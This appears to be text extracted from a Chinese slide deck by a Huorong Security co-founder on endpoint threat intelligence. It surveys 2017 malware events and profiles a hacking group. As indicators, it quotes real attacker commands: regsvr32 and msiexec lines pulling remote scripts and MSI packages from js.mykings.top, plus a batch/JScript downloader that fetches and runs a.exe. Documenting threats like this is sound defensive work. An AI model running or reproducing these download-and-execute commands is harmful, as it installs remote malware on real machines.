代码战争的主阵地——来自终端的威胁情报详述.pdf

代码战争的主阵地 ：来自终端的威胁情报详述 周 军 火绒安全联合创始人 • 2017/2/2 ：”Mirai”物联网病毒变种 – /newish-mirai-spreader-poses-new-risks/77621/ • 2017/4/14 ：微软针对”Shadow Brokers”泄漏漏洞发布Blog – /msrc/2017/04/14/protecting-customers-and-evaluating-risk/ • 2017/5/12 ：勒索病毒”Wannacry”席卷全球 – / msrc/2017/05/12/customer -guidance-for-wannacrypt-attacks/ • 2017/5/15 ：报道称发现利用”EternalBlue”入侵服务器挖矿 – /us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue- doublepulsar • 2017/5/17 ：报道称中国黑客利用”EternalBlue”传播后门 – /eternalblue-exploit-actively-used-deliver-remote-access-trojans/ • 2017/6/27 ：新”Petya”病毒通过泄漏漏洞卷土重来 – /wiki/Petya_(malware) “隐匿者” 一个“低调”的黑客组织 终端威胁信息感知 远程脚本运行 C:\Windows\System32\ regsvr32.exe /u /s /i:http://js.mykings.top :280/v.sct scrobj.dll 运行远程MSI安装包 C:\Windows\System32\ msiexec.exe /i http://js.mykings.top :280/helloworld.msi /q cmd /c echo=1/*nulc:\az1.batecho @clsc:\az1.batecho echo offc:\az1.batecho call :http /js/a.exe c:\a.exec:\az1.batecho start c:\a.exec:\az1.batecho :httpc:\az1.batecho cscript -nologo -e:jscript %~f0 %~1 %~2c:\az1.batecho goto :eofc:\az1.batecho */c:\az1.batecho var iLocal,iRemote,xPost,sGet;c:\az1.batecho iLocal =WScript.Arguments(1);c:\az1.bat echo iRemote = WScript.Arguments(0);c:\az1.bat echo iLocal=iLocal.toLowerCase();c:\az1.batecho xPost = new 隐藏执行可疑脚本 ActiveXObject(MSXML2.XMLHTTP.3.0);c:\az1.batecho xPost.Open(GET,iRemote,0);c:\az1.batecho xPost.Send();c:\az1.batecho sGet = new ActiveXObject(ADODB.Stream);c:\az1.batecho sGet.Mode = 3;c:\az1.batecho sGet.Type = 1;c:\az1.bat echo sGet.Open();c:\az1.bat echo sGet.Write(xPost.responseBody);c:\az1.batecho